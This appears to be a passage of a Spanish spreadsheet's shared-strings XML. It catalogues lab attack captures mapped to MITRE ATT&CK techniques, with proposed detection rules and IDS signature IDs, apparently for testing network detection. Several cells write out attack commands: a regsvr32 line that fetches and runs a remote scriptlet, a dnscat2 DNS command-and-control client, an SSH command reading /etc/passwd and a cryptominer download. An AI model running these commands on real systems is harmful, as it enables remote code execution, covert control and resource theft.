    <t>Manual [1] / E.14</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.35</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002749, 2100402, 2002752, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100254</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2100402, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100254</t>
    </r>
  </si>
  <si>
    <t>Fraggle</t>
  </si>
  <si>
    <t>T1498-Fraggle_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de datagramas UDP hacia un puerto concreto, con fin de saturarlo y causar su inoperatividad</t>
  </si>
  <si>
    <t>Manual [1] /  3.4.5</t>
  </si>
  <si>
    <t>Manual [1] / E.13</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.36</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100402</t>
  </si>
  <si>
    <t>Smurf</t>
  </si>
  <si>
    <t>T1498-Smurf_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de respuestas ICMP</t>
  </si>
  <si>
    <t>Manual [1] /  3.3.1</t>
  </si>
  <si>
    <t>Manual [1] / E.7</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.37</t>
  </si>
  <si>
    <t>2100527, 2002749, 2100408, 2002752, 2101620</t>
  </si>
  <si>
    <t>2002752, 2100527, 2101620, 2100408, 2002749</t>
  </si>
  <si>
    <t>Inundación de TCBPDU</t>
  </si>
  <si>
    <t>T1498-Tcbpdu_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  3.2.2</t>
  </si>
  <si>
    <t>Manual [1] / E.5</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.38</t>
  </si>
  <si>
    <t>Resource Hijacking</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>Descarga y puesta en marcha de software de criptominado</t>
  </si>
  <si>
    <t>XMRIG</t>
  </si>
  <si>
    <t>T1496-Cryptomining_[2].pcapng</t>
  </si>
  <si>
    <t>Instalacion y uso de software de minado. Comando: wget https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz;</t>
  </si>
  <si>
    <t>Manual [2] /  3.3.2.1</t>
  </si>
  <si>
    <t>Manual [2] / 4.2.2.3</t>
  </si>
  <si>
    <t>2002752, 2002749, 254</t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>Internal Defacement</t>
  </si>
  <si>
    <t>T1491.001</t>
  </si>
  <si>
    <t>Modificar fondo de pantalla equipo victima</t>
  </si>
  <si>
    <t>T1491.001-Internal_Defacement_[5].pcapng</t>
  </si>
  <si>
    <t>Detectable por listas negras/anomalías</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.10.1</t>
  </si>
  <si>
    <t>Application Layer Protocol</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>DNS</t>
  </si>
  <si>
    <t>T1071.004</t>
  </si>
  <si>
    <t>Command - Control via DNS</t>
  </si>
  <si>
    <t>dnscat2</t>
  </si>
  <si>
    <t>T1071-Tunel_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecta uso de dnscat</t>
  </si>
  <si>
    <t>Envio de peticiones DNS como canal de comunicaciones con la víctima. Comando: timeout 15s /root/dnscat2/client/dnscat --dns server=192.168.2.2,port=53 --secret= acabc17b6904a7f8fada4e7f8de4bce8 --no-encryption</t>
  </si>
  <si>
    <t>Manual [1] /  5.2.3</t>
  </si>
  <si>
    <t>Manual [1] / E.17</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.30</t>
  </si>
  <si>
    <t>Multi-Stage Channels</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>Sesión Remota + Ataque C2</t>
  </si>
  <si>
    <t>RDP, Covenant</t>
  </si>
  <si>
    <t>T1104-Multi_stage_channels_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías. Investigación de las sesiones establecidas en el equipo atacante (siempre que sea posible) para identificar un rastro de otra dirección.</t>
  </si>
  <si>
    <t>Manual [4] /  3.22</t>
  </si>
  <si>
    <t>Manual [4] / B.22</t>
  </si>
  <si>
    <t>Manual [4] / 4.22</t>
  </si>
  <si>
    <t>NO (fuera del alcance de la red a proteger)</t>
  </si>
  <si>
    <t>SI [1]. Establecimiento de conexión C&amp;C</t>
  </si>
  <si>
    <t>2027792, 2027793</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2002752, 2002749</t>
    </r>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>Traspaso de canal primario C2 a canal alternativo</t>
  </si>
  <si>
    <t>Covenant</t>
  </si>
  <si>
    <t>T1008-Fallback_channels_[4].pcapng</t>
  </si>
  <si>
    <t>La detección de la creación del canal es posible para este caso concreto, en el que el cortafuegos detecta la creación de ambos canales. Sin embargo, si ambos canales, tanto primario como secundario están establecidos, y no se ha detectado su creación, el cambio de uno a otro es inapreciable por el cortafuegos.</t>
  </si>
  <si>
    <t>Manual [4] /  3.19</t>
  </si>
  <si>
    <t>Manual [4] / B.19</t>
  </si>
  <si>
    <t>Manual [4] / 4.19</t>
  </si>
  <si>
    <t>2027792, 2027793, 2027326</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2027792, 2027793, 2027326, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2027792, 2027793, 2027326, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2027792, 2027793, 2027326, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101620</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2044666</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2051116</t>
    </r>
  </si>
  <si>
    <t>2002752, 2101620, 2002749</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2027792, 2027793, 2027326, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2044666</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2051116</t>
    </r>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>One-Way Communication</t>
  </si>
  <si>
    <t>T1102.003</t>
  </si>
  <si>
    <t>Subida de información confidencial a Workspace de Google Drive</t>
  </si>
  <si>
    <t>Covenant, Google Drive API</t>
  </si>
  <si>
    <t>T1102.003-Web_service-one_way_communication_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías, observando actividad inusual relacionada con el uso de servicios web (subidas pesadas de información a la nube, comunicación periódica con servidores web concretos, etc)</t>
  </si>
  <si>
    <t>Manual [4] /  3.21</t>
  </si>
  <si>
    <t>Manual [4] / B.21</t>
  </si>
  <si>
    <t>Manual [4] / 4.21</t>
  </si>
  <si>
    <t xml:space="preserve">SI [1]. Establecimiento de conexión C&amp;C </t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2002752, 2002749, 2100628</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2100628</t>
    </r>
  </si>
  <si>
    <t>Proxy</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>Internal Proxy</t>
  </si>
  <si>
    <t>T1090.001</t>
  </si>
  <si>
    <t>Uso de Equipo interno como Proxy para el ataque C2</t>
  </si>
  <si>
    <t>T1090-Proxy_internal_proxy_[4].pcapng</t>
  </si>
  <si>
    <t>Aunque sí es detectable la conexión C2 directa con el atacante, no existe un mecanismo de detección concreto que pueda identificar el uso de un proxy, más allá de una detección por anomalías, como la repetición de paquetes, dando a entender que un equipo interno está replicando paquetes, y por tanto está actuando como proxy</t>
  </si>
  <si>
    <t>Manual [4] /  3.20</t>
  </si>
  <si>
    <t>Manual [4] / B.20</t>
  </si>
  <si>
    <t>Manual [4] / 4.20</t>
  </si>
  <si>
    <t>2027794, 2027793, 2027792</t>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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xml:space="preserve">, 50447, 2002752, 2002749, 2101620 </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027794, 2027793, 2027792</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 50447</t>
    </r>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>Protocol Impersonation</t>
  </si>
  <si>
    <t>T1001.003</t>
  </si>
  <si>
    <t>Falsificación de protocolos de conexión segura como SSL o TLS</t>
  </si>
  <si>
    <t>FakeTLS (raykaryshyn Github)</t>
  </si>
  <si>
    <t>T1001.003-Data_obfuscation_protocol_impersonation_[4].pcapng</t>
  </si>
  <si>
    <t>Regla personalizada que compruebe el campo Server Name y mediante DNS asegure si se corresponde con la dirección IP a la que se está accediendo.</t>
  </si>
  <si>
    <t>Manual [4] /  3.17</t>
  </si>
  <si>
    <t>Manual [4] / B.17</t>
  </si>
  <si>
    <t>Manual [4] / 4.17</t>
  </si>
  <si>
    <t>20022752, 2002749</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t>T1001.002</t>
  </si>
  <si>
    <t>Inserción de información confidencial en una imagen JPG</t>
  </si>
  <si>
    <t>Covenant, SSH, scp, Powershell</t>
  </si>
  <si>
    <t>T1001.002-Data_obfuscation_steganography_[4].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Detección por anomalías y/o estegoanálisis, envío de imágenes o ficheros con formato poco común entre equipos, existencia de ficheros comprimidos sospechosos, etc. </t>
  </si>
  <si>
    <t>Manual [4] /  3.18</t>
  </si>
  <si>
    <t>Manual [4] / B.18</t>
  </si>
  <si>
    <t>Manual [4] / 4.18</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100628</t>
  </si>
  <si>
    <t>Ingress Tool Transfer</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>Transferencia de archivos de un servidor C2 a un equipo previamente comprometido</t>
  </si>
  <si>
    <t>Metasploit, FTP</t>
  </si>
  <si>
    <t>T1105-Ingress_Tool_Transfer_[5].pcapng</t>
  </si>
  <si>
    <t>Reglas genéricas que detecten un traspaso de archivos entre equipos utilizando protocolos de transferencia de ficheros como SMB, FTP... Dependiendo de las circunstancias del ataque tambien es importante detectar la transferencia de archivos malware que sean detectables mediante tráfico de red.</t>
  </si>
  <si>
    <t>Servidor FTP en el servidor C2. A través de la conexión del atacante a la víctima, usando el comando ftp transferimos herramientas desde el servidor C2 a la víctima</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.8.1</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027768</t>
    </r>
  </si>
  <si>
    <t>Data Encoding</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>Standard Encoding</t>
  </si>
  <si>
    <t>T1132.001</t>
  </si>
  <si>
    <t>Codificacion de mensajes entre la victima y el C2 Server mediante Base64</t>
  </si>
  <si>
    <t>Metasploit, curl, base64</t>
  </si>
  <si>
    <t>T1132.001_Standard_Encoding_[5].pcapng</t>
  </si>
  <si>
    <t>Deteccion por anomalias</t>
  </si>
  <si>
    <t>Servidor HTTP en el C2 Server. Intercambio de mensajes entre la victima y atacante mediante base64</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.8.2</t>
  </si>
  <si>
    <t>Remote Access Software</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>Uso de TeamViewer para establecer canal de comunicación alternativo</t>
  </si>
  <si>
    <t>TeamViewer</t>
  </si>
  <si>
    <t>T1219-RemoteAccessSoftwareLocal_[5].pcapng</t>
  </si>
  <si>
    <t>Deteccion por listas negras/anomalías. Monitorizar tráfico de red correspondiente a softwares de acesso remoto(AnyDesk, TeamViewer...)</t>
  </si>
  <si>
    <t>Conexion mediante TeamViewer entre dos equipos</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.8.3</t>
  </si>
  <si>
    <t>T1219-RemoteAccessSoftwareNAT_[5].pcapng</t>
  </si>
  <si>
    <t>Dynamic Resolution</t>
  </si>
  <si>
    <t>T1568</t>
  </si>
  <si>
    <t>Fast Flux DNS</t>
  </si>
  <si>
    <t>T1568.001</t>
  </si>
  <si>
    <t>Esconder un C2 Server mediante un servidor DNS con bajo TTL y modo Fast Flux</t>
  </si>
  <si>
    <t>bind, Metasploit</t>
  </si>
  <si>
    <t>T1568-fastFluxDNS_[5].pcapng</t>
  </si>
  <si>
    <t>Deteccion por anomalias o listas negras</t>
  </si>
  <si>
    <t>Servidor DNS "Round Robin"</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.8.4</t>
  </si>
  <si>
    <t>366, 29456, 384, 408</t>
  </si>
  <si>
    <t>366, 29456, 384, 408, 2100366</t>
  </si>
  <si>
    <t>366, 29456, 384, 408, 2002752, 2002749, 2100366, 2100384, 2100408</t>
  </si>
  <si>
    <t>2002752, 2100384, 2100366, 2100408, 2002749</t>
  </si>
  <si>
    <t>Hide Infrastructure</t>
  </si>
  <si>
    <t>T1665</t>
  </si>
  <si>
    <t>Esconder el servidor C2 utilizando un Proxy</t>
  </si>
  <si>
    <t>Metasploit, HTTP Server</t>
  </si>
  <si>
    <t>T1665-Hide_Infrastructure_[5].pcapng</t>
  </si>
  <si>
    <t>Detección por reglas/anomalías. Resulta importante monitorizar tráfico de red con destino a dominios incluidos en listas negras, conexiones a equpos externos...</t>
  </si>
  <si>
    <t>Esconder el servidor C2 utilizando un proxy</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.8.5</t>
  </si>
  <si>
    <t>Protocol Tunneling</t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>Tunelizar la conexión al C2 Server mediante SSH</t>
  </si>
  <si>
    <t>SSH, Metasploit</t>
  </si>
  <si>
    <t>T1572-Protocol_Tunneling_[5].pcapng</t>
  </si>
  <si>
    <t>Deteccion por anomalías, monitorizando la creacion de nuevas conexiones</t>
  </si>
  <si>
    <t>Tunelizar una conexion mediante SSH</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.8.6</t>
  </si>
  <si>
    <t>Encrypted Channel</t>
  </si>
  <si>
    <t>T1573</t>
  </si>
  <si>
    <t>Assymetric Cryptography</t>
  </si>
  <si>
    <t>T1573.002</t>
  </si>
  <si>
    <t>Encriptar conexion con C2 Server</t>
  </si>
  <si>
    <t>Metasploit, OpenSSL</t>
  </si>
  <si>
    <t>T1573.002_AssymetricCryptography_[5].pcapng</t>
  </si>
  <si>
    <t>Encriptar conexion al C2 Server</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.8.7</t>
  </si>
  <si>
    <t>Non-Standard Port</t>
  </si>
  <si>
    <t>T1571</t>
  </si>
  <si>
    <t>Sesión SSH en puerto 2200</t>
  </si>
  <si>
    <t>ssh</t>
  </si>
  <si>
    <t>T1571-SSH_[2].pcapng</t>
  </si>
  <si>
    <t>Establecer una sesion SSH sobre un puerto no estandar. Comando: sshpass -p salas ssh salas@192.168.2.2 -p 2200 cat /etc/passwd</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.9.1</t>
  </si>
  <si>
    <t>2002752, 2002749, 13586</t>
  </si>
  <si>
    <t>Defense Evasion, Persistence</t>
  </si>
  <si>
    <t>Traffic Signaling</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>Port Knocking</t>
  </si>
  <si>
    <t>T1205.001</t>
  </si>
  <si>
    <t>Esconder y activar un puerto de forma remota</t>
  </si>
  <si>
    <t>Knockd</t>
  </si>
  <si>
    <t>T1205.001-Port_Knocking_[3].pcapng</t>
  </si>
  <si>
    <t>Ocultar y activar un puerto remotamente, haciendo primero peticiones a ciertos puertos de forma secuencial. Comando: knock -v 172.16.2.2 7000 8000 9000</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.11</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.11.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.11.5</t>
  </si>
  <si>
    <t>TA0005</t>
  </si>
  <si>
    <t>Indicator Removal</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t>T1070.005</t>
  </si>
  <si>
    <t>Eliminación de conexiones establecidas via Network Share en Windows</t>
  </si>
  <si>
    <t>T1070-Indicator_removal_network_share_connection_removal_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías basada en desconexión repentina procedente de una dirección de varios recursos compartidos</t>
  </si>
  <si>
    <t>Manual [4] /  3.8</t>
  </si>
  <si>
    <t>Manual [4] / B.8</t>
  </si>
  <si>
    <t>Manual [4] / 4.8</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>Modificación del Registro de forma remota</t>
  </si>
  <si>
    <t>reg (Remoto)</t>
  </si>
  <si>
    <t>T1112-Modify_registry_[4].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Regla que detecte el envío de mensajes con protocolo WINREG o Remote Registry Service </t>
  </si>
  <si>
    <t>Manual [4] /  3.9</t>
  </si>
  <si>
    <t>Manual [4] / B.9</t>
  </si>
  <si>
    <t>Manual [4] / 4.9</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>38319</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>38319</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>38319</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2002752, 2002749, 2044666, 2051116</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>38319</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2044666, 2051116</t>
    </r>
  </si>
  <si>
    <t>Rogue Domain Controller</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>DCShadow: registro de un DC fraudulento para habilitar la manipulación de datos en un entorno Active Directory</t>
  </si>
  <si>
    <t>T1207-Rogue_domain_controller_[4].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte una llamada a la función DRSUAPI_REPLICA_ADD (5)</t>
  </si>
  <si>
    <t>Manual [4] /  3.10</t>
  </si>
  <si>
    <t>Manual [4] / B.10</t>
  </si>
  <si>
    <t>Manual [4] / 4.10</t>
  </si>
  <si>
    <t>System Binary Proxy Execution</t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>T1218.010</t>
  </si>
  <si>
    <t>Ejecución de COM scriptlet remoto</t>
  </si>
  <si>
    <t>Regsvr32.exe</t>
  </si>
  <si>
    <t>T1218.010-COM_Scriptlet_[2].pcapng</t>
  </si>
  <si>
    <t>Aprovechar vulnerabilidad regsvr32.exe descargando y ejecutando scripts y librerias evadiendo controles de seguridad Windows. Comando: C:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll</t>
  </si>
  <si>
    <t>Manual [2] /  3.3.1.1</t>
  </si>
  <si>
    <t>Template Injection</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>Inyectar un fichero mediante Phishing .docx con macros modificadas que permita pasar desapercibido</t>
  </si>
  <si>
    <t>Sitios web convencionales (Gmail)</t>
  </si>
  <si>
    <t>T1221-Template_Injection_[5].pcapng</t>
  </si>
  <si>
    <t>Detección por lista negra/anomalías. Debería monitorizarse y detectar tráfico de red hacia direcciones o dominios marcados en listas negras. En algún caso concreto, se puede descargar y ejecutar malware por lo que se debe monitorizar y detectar la descarga de este tipo de ficheros</t>
  </si>
  <si>
    <t>Modificación de fichero .docx para, mediante macros, provocar la descarga y ejecución de malware en el equipo víctima</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.4.1</t>
  </si>
  <si>
    <t>402, 50447</t>
  </si>
  <si>
    <t>402, 50447, 2002752, 2002749, 2013491, 2013490, 2009768, 2100402</t>
  </si>
  <si>
    <t>402, 50447,  2013491, 2013490, 2009768</t>
  </si>
  <si>
    <t>Network Boundary Bridging</t>
  </si>
  <si>
    <t>T1599</t>
  </si>
  <si>
    <t>NAT Traversal</t>
  </si>
  <si>
    <t>T1599.001</t>
  </si>
  <si>
    <t>Modificación de políticas de red para permitir tráfico externo a la red  interna</t>
  </si>
  <si>
    <t>iptables</t>
  </si>
  <si>
    <t>T1599-NBB1_[5].pcapng</t>
  </si>
  <si>
    <t>Deteccion por anomalías</t>
  </si>
  <si>
    <t>Equipo intermedio entre red interna de la víctima y el atacante con firewall. El atacante con acceso a este equipo intermedio modifica las reglas del firewall iptables para permitir su tráfico.</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.4.2</t>
  </si>
  <si>
    <t>T1599-NBB2_[5].pcapng</t>
  </si>
  <si>
    <t>Salto de VLAN</t>
  </si>
  <si>
    <t>T1599-Salto_vlan_[1].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías y estudio de topología de red, que detecte posibles vulnerabilidades relacionadas con el etiquetado apilable 802.1Q</t>
  </si>
  <si>
    <t>Manual [1] /  3.2.1</t>
  </si>
  <si>
    <t>Manual [1] / E.4</t>
  </si>
  <si>
    <t>2101620, 2002752, 2002749</t>
  </si>
  <si>
    <t>Build Image on Host</t>
  </si>
  <si>
    <t>T1612</t>
  </si>
  <si>
    <t>Creacion y montado de un contenedor con un servidor SSH sobre un equipo previamente vulnerado</t>
  </si>
  <si>
    <t>DockerAPI, SSH</t>
  </si>
  <si>
    <t>T1612-BuildImageOnHostLocal_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte descargas de contenedores mediante Docker API</t>
  </si>
  <si>
    <t>Construir contenedor sobre el equipo víctima para evitar ser detectados.</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.4.3</t>
  </si>
  <si>
    <t>2001117, 2003195</t>
  </si>
  <si>
    <t xml:space="preserve"> T1612-BuildImageOnHostNAT_[5].pcapng</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>TA0008</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>T1021.004</t>
  </si>
  <si>
    <t>Sesión SSH</t>
  </si>
  <si>
    <t>T1021-remote_services_ssh_[3].pcapng</t>
  </si>
  <si>
